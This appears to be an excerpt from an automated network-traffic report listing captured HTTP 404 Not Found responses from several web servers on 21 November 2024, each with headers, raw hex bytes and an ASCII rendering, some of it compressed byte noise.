22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:22:42 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BjKVYOoOrM11IgIlfh1%2Bf2WxSOXkBcXa5Ddz0z8EyzZud1gcrcKiOOtjw%2FXu5%2BeqTEmf5N3%2FD3kJRyslTP3UrLOIgI2GIP3dOe1LSFxtcRPDFwRdyxGQFyniT4YuuaUJj4ciQed8Yw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61ad3eca210f70-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1580&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=604&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 ef 6b db 30 10 fd 9e bf 42 0b a5 92 21 b5 92 ae 6c a3 fe 01 6d 92 b2 42 d2 96 2d 65 8c 31 8a 2c 9d 6d 15 47 f2 24 25 21 4b fc bf 0f db 69 9a 15 da b1 0f 06 49 f7 de bd bb d3 b3 c2 77 a3 db e1 ec fb dd 18 7d 9e 4d 27 e8 ee fe 72 72 3d 44 dd 13 4a af c7 b3 2b 4a 47 b3 51 1b 39 f5 fb 94 8e 6f ba 71 27 cc dd bc 88 c3 1c 98 88 3b a1 93 ae 80 f8 ac 7f 86 6e b4 43 57 7a a1 44 48 db c3 4e 48 1b 50 98 68 b1 ae 79 83 f8 00 93 0f e2 4e 58 c6 b3 1c 90 81 5f 0b b0 0e 04 ba ff 32 41 2b 66 91 d2 0e a5 35 0e 69 85 5c 2e 2d b2 60 96 60 fc 90 96 0d ed 42 08 e9 a4 56 ac 28 d6 3d c4 d0 5f 05 74 c0 18 6d 9a 44 a0 b8 5e 28 07 06 04 5a e5 b2 00 e4 cc 5a aa 0c 39 8d 16 16 10 53 68 5c 83 47 9a 2f e6 a0 5c 7d 9e 33 25 6a e0 73 65 3b 59 cb 8d 2c 5d 4c d2 85 e2 b5 38 f1 36 4f 4b c4 89 b7 59 32 83 92 88 f9 5c 2b 07 ca 3d e5 dc 6e f7 47 df a4 12 7a e5 8b 5d 24 90 29 49 5a 9e 88 12 9f 1b 60 0e c6 05 d4 31 82 5b 39 ec 05 c2 97 4a 81 a9 ef 21 ea ae da 14 0f 0f c3 ab 23 be 3c 2a 99 61 73 1b 6d cc 39 fe 04 1f 06 4c bc 07 ce 4e 07 fd f4 63 1f f7 dc 39 9e ce f8 ef e9 e3 f5 6a fa 78 7f 3a 95 67 ab e9 e8 a2 fe 22 5c 05 b5 2c 8b 9e 6a 79 55 9d f9 4a 2b 0e 11 c6 01 f3 ad e1 11 a6 5c a8 13 9e 49 ca 73 56 14 a0 32 38 29 0b e6 52 6d e6 b4 a5 59 fa 68 05 9d 33 a9 fc 47 8b 83 bd 46 06 Data Ascii: 2a6Tk0B!lmB-e1,mG$%!KiIw}M'rr=DJ+JGQ9oq';nCWzDHNHPhyNX_2A+f5i\.-``BV(=_tmD^(ZZ9Sh\G/\}3%jse;Y,]L86OKY2\+=nGz]$)IZ`1[9J!#<*asm9LNc9jx:g"\,jyUJ+\IsV28)RmYh3GF
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:22:45 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gMZGK1ElQpsQRBkpCuE1BjbMBg2uqWfXOyBUdqIHgN5iPAiDPHbk9LFDu1xJhT68UUsAhmtUbbVAv8MHp7RJvA2QJ9LOdIMTkre5VvuWGrdfrLdM3xU01gOsWkTD02nBcY9YsBxR1w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61ad4fbe7142ea-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1611&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=628&delivery_rate=0&cwnd=141&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 ef 6b db 30 10 fd 9e bf 42 0b a5 92 21 b5 9b 12 b6 51 ff 80 36 49 59 21 49 cb 9a 32 c6 18 45 96 ce b1 82 22 79 92 92 90 25 fe df 87 ed 34 cd 0a ed d8 07 83 a4 7b ef de dd e9 59 d1 87 c1 5d 7f fa fd 7e 88 be 4c c7 23 74 ff 78 3d ba ed a3 f6 59 10 dc 0e a7 37 41 30 98 0e 9a c8 85 7f 1e 04 c3 49 3b 69 45 b9 5b c8 24 ca 81 f2 a4 15 39 e1 24 24 bd f3 1e 9a 68 87 6e f4 52 f1 28 68 0e 5b 51 50 83 a2 54 f3 4d c5 eb 26 47 98 bc 9b b4 a2 22 99 e6 80 0c fc 5a 82 75 c0 d1 e3 d7 11 5a 53 8b 94 76 28 ab 70 48 2b e4 72 61 91 05 b3 02 e3 47 41 51 d3 ae 38 17 4e 68 45 a5 dc 74 10 45 7f 15 d0 02 63 b4 a9 13 81 62 7a a9 1c 18 e0 68 9d 0b 09 c8 99 8d 50 33 e4 34 5a 5a 40 54 a1 61 05 1e 68 b6 5c 80 72 d5 79 4e 15 af 80 2f 95 ed 65 2d 33 a2 70 09 c9 96 8a 55 e2 c4 db 3e 2f 11 23 de 76 45 0d 4a 63 ea 33 ad 1c 28 f7 9c 73 b7 3b 1c 7d 13 8a eb b5 cf f7 91 50 64 24 6d 78 3c 4e 7d 66 80 3a 18 4a a8 62 04 37 72 d8 0b b9 2f 94 02 53 dd 43 dc 5e 37 29 9e 9e fa 37 27 6c 75 52 50 43 17 36 de 9a 4b fc 19 3e 76 29 ef 65 29 7c ea f6 2e 80 e2 8e bb c4 e3 29 fb 3d 9e df ae c7 f3 c7 8b c9 43 6f 3d 1e 5c 55 5f 8c cb b0 92 a5 f1 73 2d 6f aa 53 5f 69 c5 20 c6 38 a4 be 35 2c c6 01 e3 ea 8c cd 44 c0 72 2a 25 a8 19 9c 15 92 ba 4c 9b 45 d0 d0 6c 30 b7 3c 58 50 a1 fc b9 c5 e1 41 63 06 6e 2f 60 af 37 53 3a 9b Data Ascii: 2a6Tk0B!Q6IY!I2E"y%4{Y]~L#tx=Y7A0I;iE[$9$$hnR(h[QPTM&G"ZuZSv(pH+raGAQ8NhEtEcbzhP34ZZ@Tah\ryN/e-3pU>/#vEJc3(s;}Pd$mx<N}f:Jb7r/SC^7)7'luRPC6K>v)e)|.)=Co=\U_s-oS_i 85,Dr*%LEl0<XPAcn/`7S:
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:22:47 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WNJHNMP1s4YqATvDiWrCgeCuP33KOWUl9QLx7VCZa6ggiLLWkglY3iE%2BG6vJnnWhLyQ7YBz1%2Fz0G%2Fk5NvqwGbipoEPRh6EOWWlAz1FGij3c9o2fzExkQLVDz4t9%2FDU9hIeZweCxwEQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61ad6079ea32d0-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3123&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1641&delivery_rate=0&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 62 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 ef 6b db 30 10 fd 9e bf 42 0d a5 b2 21 b5 d2 ae 74 5b fd 03 ba 24 65 85 24 2d 5b ca 18 63 14 59 3a db 0a 8e e4 49 4a 82 97 f8 7f 1f b6 d3 34 2b b4 63 1f 0c 92 ee bd 7b 77 a7 67 05 47 c3 bb c1 ec fb fd 08 7d 9e 4d c6 e8 fe e1 d3 f8 76 80 ba a7 84 dc 8e 66 37 84 0c 67 c3 36 72 ee f5 09 19 4d bb 51 27 c8 ec 22 8f 82 0c 28 8f 3a 81 15 36 87 e8 a2 7f 81 a6 ca a2 1b b5 94 3c 20 ed 61 27 20 0d 28 88 15 2f 6b de 59 74 80 c9 ce a2 4e 50 44 b3 0c 90 86 5f 4b 30 16 38 7a f8 32 46 6b 6a 90 54 16 25 35 0e 29 89 6c 26 0c 32 a0 57 a0 bd 80 14 0d ed 9a 73 61 85 92 34 cf cb 1e a2 e8 af 02 3a a0 b5 d2 4d 22 90 4c 2d a5 05 0d 1c ad 33 91 03 b2 ba 14 32 45 56 a1 a5 01 44 25 1a d5 e0 a1 62 cb 05 48 5b 9f 67 54 f2 1a f8 5c d9 4e d6 30 2d 0a 1b 39 c9 52 b2 5a dc 71 37 4f 4b c4 1c 77 b3 a2 1a c5 21 f5 98 92 16 a4 7d ca b9 dd ee 8f be 09 c9 d5 da e3 bb 88 2f 12 27 6e 79 3c 8c 3d a6 81 5a 18 e5 50 c7 1c dc ca 61 d7 e7 9e 90 12 74 7d 0f 61 77 dd a6 78 7c 1c dc 1c b3 d5 71 41 35 5d 98 70 a3 af f0 07 b8 3c a3 fc b2 ff fe 23 d0 77 e7 bc 8f 7b f6 0a 4f 66 ec f7 64 7e bb 9e cc 1f ce a7 e5 c5 7a 32 bc ae bf 10 57 7e 2d 4b c3 a7 5a 5e 55 a7 9e 54 92 41 88 b1 4f 3d a3 59 88 09 e3 f2 94 a5 82 b0 8c e6 39 c8 14 4e 8b 9c da 44 e9 05 69 69 86 cc 0d 27 0b 2a a4 37 37 d8 df 6b Data Ascii: 2b2Tk0B!t[$e$-[cY:IJ4+c{wgG}Mvf7g6rMQ'"(:6< a' (/kYtNPD_K08z2FkjT%5)l&2Wsa4:M"L-32EVD%bH[gT\N0-9RZq7OKw!}/'ny<=ZPat}awx|qA5]p<#w{Ofd~z2W~-KZ^UTAO=Y9NDii'*77k
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:22:50 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=En%2BN%2BPcwoi8J4UHt61U1AZt8GLf4%2F%2FaB86evH%2Bv6dcGDcDNlvLNoQIT3y8mSYLvwvipgtgFbHaI01pQnyLPae70cJoJxzdpmWegBU4Y1EZWz7VHhyhP6rgPEGM4%2B91i90LSHdytFHw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61ad724b5943b0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2099&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=342&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 Data Ascii: 4e5<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$par
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:22:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:23:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:23:02 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:23:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 15:23:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
